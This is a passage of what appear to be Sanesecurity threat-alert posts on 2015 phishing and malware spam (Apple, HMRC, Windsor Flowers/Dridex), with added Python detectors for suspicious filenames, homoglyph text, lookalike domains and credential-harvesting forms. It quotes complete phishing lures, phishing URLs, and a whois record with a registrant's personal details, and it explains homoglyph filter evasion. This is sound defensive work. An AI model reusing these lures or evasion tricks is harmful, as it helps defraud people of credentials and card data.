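        zf.writestr(member, b"MZ" + b"\0" * 64)
    return buf.getvalue()


if __name__ == "__main__":
    for n in ("fax167987861_pdf.scr", "5ugshabe_foto_jpeg.exe",
              "Acount.html.html", "fax167087861.pdf"):
        print(n, "->", suspicious_name(n) or "clean")
    print(inspect_zip(build_sample_zip("fax167987861_pdf.scr")))
```

The same `suspicious_name` check applies to CAB members; only the archive reader differs (Python's standard library has no CAB parser, so that side is left out here). Bear in mind that the check is on names only: a genuinely named `.exe` is still caught, but a macro document such as the `.doc` attachments elsewhere on this page is not, and needs content inspection instead.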

Md5 Hashes:
0c4e3c7b93184122864ea65755732a3e [1]

Malware Information:

VirusTotal Report [1] (hits 1/57 Virus Scanners)

Malwr Report [1]

Summary:

  • The binary likely contains encrypted or compressed data.
  • Executed a process and injected code into it, probably while unpacking
  • Installs itself for autorun at Windows startup

Hybrid Analysis Report [1]

Cheers,

Steve
Sanesecurity.com

phishing: Apple Account Suspended www1-apple.com

Alert Summary:

Phishing: 'Apple Account Suspended' emails, linking to www1-apple.com, saying that due to a problem with some of your account information your account has been temporarily locked.

Sample Message headers:
From: Apple {do_not_reply@eur.apple.com}
Subject: Apple Account Suspended - Apple.com
Sample Message body:

This is an automated message, please do not reply.

Dear Αpple Custοmer,

Due tο a prοblem with sοme of your accοunt infοrmatiοn, we have tempοrarily lοcked yοur accοunt.

Whilst yοur accοunt is lοcked yοu will be unable tο use services such as the Αpp Stοre / iΤunes store and usage of iClοud will be limited.

To unlοck your accοunt we need you to update your accοunt infοrmatiοn.

Click the following link to update the infοrmatiοn on your accοunt.
Update now >
The reasοn we sent yοu this email is because ΑppΙe takes security very seriοusly and we need tο ensure that we have the mοst up tο date infοrmatiοn οn file fοr οur custοmers tο prevent unauthοrised use.

It may just be that yοur payment methοd has expired or your accοunt infοrmatiοn is incomplete.
In οrder to avοid yοur accοunt being permanently clοsed we require yοu tο update yοur infοrmation within 24 hοurs οf this email being sent.

If you have already validated your account within the last 48 hours then you do not have to do anything, simply ignore this message.
ΑppΙe Suppοrt

Case Ref: 481,077-00-30-8

The 'Update now' link doesn't take you to Apple but instead to a URL shortener:
http://tiny.cc/ty73sx
The URL redirector then takes you to this domain, which hosts the phishing site:
http://www1-apple.com/signin?sslchannel=true

The fake phishing site looks like this:
At first glance it looks like the genuine apple.com, but look closely at the address: www1-apple.com, a separate domain that merely contains the word "apple".

The fake Apple domain was set up on 26 January 2015, two days before this post, through the same registrar, the same name servers and the same registrant (David Ayeni) as the www1-barclays.com domain in the Barclays post above; whois details here:
Domain Name: WWW1-APPLE.COM
Registrar: PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Sponsoring Registrar IANA ID: 303
Whois Server: whois.PublicDomainRegistry.com
Referral URL: http://www.PublicDomainRegistry.com
Name Server: RS133.REGISTRAR-SERVERS.COM
Name Server: RS33.REGISTRAR-SERVERS.COM
Updated Date: 26-jan-2015
Creation Date: 26-jan-2015
Expiration Date: 26-jan-2016

Domain Name: WWW1-APPLE.COM
Registry Domain ID: 
Registrar WHOIS Server: whois.publicdomainregistry.com
Registrar URL: www.publicdomainregistry.com
Updated Date: 2015-01-26T22:21:54Z
Creation Date: 2015-01-26T22:21:53Z
Registrar Registration Expiration Date: 2016-01-26T22:21:53Z
Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
Registrar IANA ID: 303
Registrar Abuse Contact Email: abuse-contact@publicdomainregistry.com
Registrar Abuse Contact Phone: +1-2013775952
Domain Status: clientTransferProhibited
Registry Registrant ID: 
Registrant Name: David Ayeni
Registrant Organization: N/A
Registrant Street: 132 Victoria Road   
Registrant City: London
Registrant State/Province: London
Registrant Postal Code: RM1 2NX
Registrant Country: GB
Registrant Phone: +44.02039483949
Registrant Phone Ext: 
Registrant Fax: 
Registrant Fax Ext: 
Registrant Email: davidayeni823@gmail.com
The fake phishing site will also ask you to hand over your credit card details....
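Two things in this lure are worth catching automatically: the message body mixes Greek letters (Α, ο, Ι, Τ) into otherwise Latin words such as "Αpple" and "Custοmer", which is a common way to slip brand names past keyword filters, and the landing host www1-apple.com contains the brand name without being under apple.com. The following Python script is an added example, not code from this post or from Sanesecurity's signatures; it reports words whose letters come from more than one script and URLs whose host imitates a brand. The brand list and the sample text are constructed for the demo.

```python
"""Flag homoglyph text and brand-lookalike hosts in a phishing lure.

Added example, not code from the Sanesecurity post. SAMPLE_BODY is a
constructed fragment modelled on the quoted 'Apple Account Suspended' body,
where Greek capital alpha, small omicron, capital iota and capital tau stand in
for Latin A, o, I and T. The BRANDS list is an assumption for the demo.
"""
import re
import unicodedata
from urllib.parse import urlsplit

# Constructed sample text (escapes make the non-Latin letters visible).
SAMPLE_BODY = (
    "Dear \u0391pple Cust\u03bfmer, \u0391pp\u0399e takes security "
    "seri\u03bfusly. Visit the i\u03a4unes store."
)

# Brand domains whose names should only appear under the brand's own domain.
BRANDS = ("apple.com", "natwest.com", "paypal.com", "hmrc.gov.uk")

def script_of(ch):
    """Coarse script name of a letter from its Unicode name ('LATIN', 'GREEK', ...)."""
    if not ch.isalpha():
        return None
    return unicodedata.name(ch, "").split(" ", 1)[0]

def mixed_script_words(text):
    """Words whose letters come from more than one script, with the script set."""
    hits = []
    for word in re.findall(r"\w+", text):
        scripts = {s for s in map(script_of, word) if s}
        if len(scripts) > 1:
            hits.append((word, tuple(sorted(scripts))))
    return hits

def non_latin_ratio(text):
    """Share of letters outside the Latin script; a cheap score for a mail filter rule."""
    letters = [c for c in text if c.isalpha()]
    if not letters:
        return 0.0
    return sum(1 for c in letters if script_of(c) != "LATIN") / len(letters)

def brand_lookalike(url):
    """Brand domain a URL's host imitates, or None if the host is genuine or unrelated."""
    host = (urlsplit(url).hostname or "").lower()
    for brand in BRANDS:
        if host == brand or host.endswith("." + brand):
            return None              # really under the brand's domain
    for brand in BRANDS:
        label = brand.split(".")[0]  # 'apple' from 'apple.com'
        if label in host:
            return brand             # brand name present, domain is not the brand's
    return None

if __name__ == "__main__":
    for word, scripts in mixed_script_words(SAMPLE_BODY):
        print(f"mixed-script word {word!r}: {'+'.join(scripts)}")
    print(f"non-Latin letter ratio: {non_latin_ratio(SAMPLE_BODY):.2f}")
    for url in ("http://www1-apple.com/signin?sslchannel=true",
                "https://cardservices.natwest.com/RBSG_Consumer/Login.do?promoCode=NatWest"):
        print(url, "->", brand_lookalike(url) or "no lookalike")
```

The lookalike check deliberately looks only at the hostname, so a brand name that appears in the path (as in the NatWest lure's diamondsandmuffins.com/app/NatWest.html) is not reported by it; the mixed-script check is the one that fires on the body text.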
Cheers,

Steve
Sanesecurity.com

Windsor Flowers Invoice 1385 Accounts word malware

Windsor Flowers Accounts Invoice 1385 email is being spammed, containing a Word document with an embedded macro.

These emails aren't from Windsor Flowers at all; the company name is just being used to make the email look more genuine, i.e. from a real company.
Note
It's also worth remembering that the company itself may not have any knowledge of this email and its link(s) or attachment, as it won't have come from their servers and IT systems but from an external botnet.

It's not advised to ring them as there won't really be anything they can do to help you.
Company:

Welcome to Windsor Flowers, your local florist in London, offering an array of beautiful flower arrangements and bouquets.

Message Header: (Note: the Invoice number is random)

From: Windsor Flowers Accounts {windsorflowersaccounts@hotmail.com}
Subject: Windsor Flowers Invoice 1385
Message Body:
Dear Accounts payable

Please see attached invoice 1385 for flowers within January 15.
Our bank details can be found at the bottom of the invoice.
If paying via transfer please reference our invoice number.

If you have any queries, please do not hesitate to contact me.

Many thanks in advance

Connie


Windsor Flowers
74 Leadenhall Market
London
EC3 V1LT
Tel: 020 7606 4277
www.windsorflowerslondon.co.uk
Attachment filename (Word document with macros):

Windsor Flowers Invoice 1385 Sheet1.doc
MD5 hashes:
f10e42cca60a2a6636658666f3621aef  [1]
cfe3f3eec33374d418ad9460649c4943 [2]

Malware Macro document information:

VirusTotal Report [1] (hits 2/57 Virus Scanners)

VirusTotal Report [2] (hits 2/57 Virus Scanners)

Malwr Report [1]

Malwr Report [2]

Decoded Macro [1]

Decoded Macro [2]



Sanesecurity signatures are blocking this as:

Sanesecurity.Malware.24676.DocHeur

NOTE

The current round of Word and Excel attachments is targeted at Windows users.

Apple and Android software can open these attachments and may even manage to run the macro embedded inside the attachment.

The auto-downloaded file is normally a Windows executable and so will not currently run on any operating system apart from Windows.

However, if you are an Apple/Android user and forward the message to a Windows user, you will then put them at risk of opening the attachment and auto-downloading the malware.

Currently these attachments try to auto-download Dridex, which is designed to steal login information for your bank accounts (either by key logging, taking automatic screenshots or copying information from your clipboard (copy/paste)).

Cheers,
Steve

Tuesday, 27 January 2015

TAX REFUND NOTIFICATION eligible to receive a tax refund

TAX REFUND NOTIFICATION eligible to receive a tax refund phishing emails are arriving, asking you to log in and process your tax refund.

Headers:
From: "HM Revenue & Customs"{online-service@hmrc.gov.uk}
Subject: TAX REFUND NOTIFICATION
Message body:
HM Revenue & Customs (HMRC)
27/01/2015

TAX REFUND NOTIFICATION

Dear Sir/Madame,

After the last annual calculations of your fiscal activity we have
determined that you are eligible to receive a tax refund of 
648.35 GBP 
Please submit the tax refund request and allow us 6-9 days in order
to process it.

To access your tax refund, please follow the steps bellow:

- download the Tax Refund Form attached to this email
- open it in a browser (recommended mozilla firefox)
- follow the instructions on your screen


A refund can be delayed for a variety of reasons. For example 
submitting invalid records or applying after the deadline.

Revenue and Tax Administrator

HM Revenue & Customs
Tax Credit Office
PO Box 1970
Liverpool
L75 1WX

TAX REFUND ID: UK381716209-HMRC

? Crown Copyright, HM Revenue & Customs
Attached to the email is an HTML file:
Refund_Form.html

The fake HTML phishing page looks like this...
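Shipping the phishing page as an HTML attachment means there is no link to check and no hosting domain to take down until the victim submits the form, so the attachment itself is what a mail gateway should inspect. The Python script below is an added example, not code from this post or from Sanesecurity; it parses an HTML attachment, collects every form, and flags forms that post to a host outside the claimed sender's domain or that ask for payment or login fields. Refund_Form.html is not reproduced on the page, so the sample form in the script is constructed and its host and field names are invented.

```python
"""Triage an HTML attachment for a credential-harvesting form.

Added example, not code from the Sanesecurity post. Refund_Form.html itself is
not reproduced on the page, so CONSTRUCTED_FORM is a made-up stand-in showing
the shape such attachments take: a page that renders locally but whose <form>
posts to a third-party host. The host and field names are invented.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

CONSTRUCTED_FORM = """
<html><body>
<h1>HM Revenue &amp; Customs - Tax Refund</h1>
<form method="post" action="http://example-collector.invalid/refund.php">
  <input name="fullname" type="text">
  <input name="card_number" type="text">
  <input name="expiry" type="text">
  <input name="cvv" type="password">
  <input type="submit" value="Submit refund request">
</form>
</body></html>
"""

# Field-name tokens that suggest payment or login data is being collected.
SENSITIVE_TOKENS = {"card", "cardnumber", "cvv", "cvc", "pin", "password", "passwd",
                    "sortcode", "account", "nino", "ssn", "dob"}

class FormCollector(HTMLParser):
    """Records each <form> with its action URL and the name/type of its inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append((a.get("name") or "", a.get("type") or "text"))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def triage_html_attachment(html, claimed_domain):
    """Findings that make the attachment look like a phishing form for claimed_domain."""
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        host = (urlsplit(form["action"]).hostname or "").lower()
        # A relative action (no host) is not reported here; the field check still applies.
        if host and host != claimed_domain and not host.endswith("." + claimed_domain):
            findings.append(f"form posts to {host}, not {claimed_domain}")
        for name, typ in form["inputs"]:
            tokens = set(re.split(r"[^a-z0-9]+", name.lower())) - {""}
            if typ.lower() == "password" or tokens & SENSITIVE_TOKENS:
                findings.append(f"sensitive field '{name}' ({typ})")
    return findings

if __name__ == "__main__":
    for line in triage_html_attachment(CONSTRUCTED_FORM, "hmrc.gov.uk"):
        print("FINDING:", line)
```

Field names are split into tokens before matching so that "pin" does not fire on "shipping"; a real gateway rule would also want to catch JavaScript that builds the form or submits it via XMLHttpRequest, which this static parse does not see.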






Cheers,

Steve
Sanesecurity.com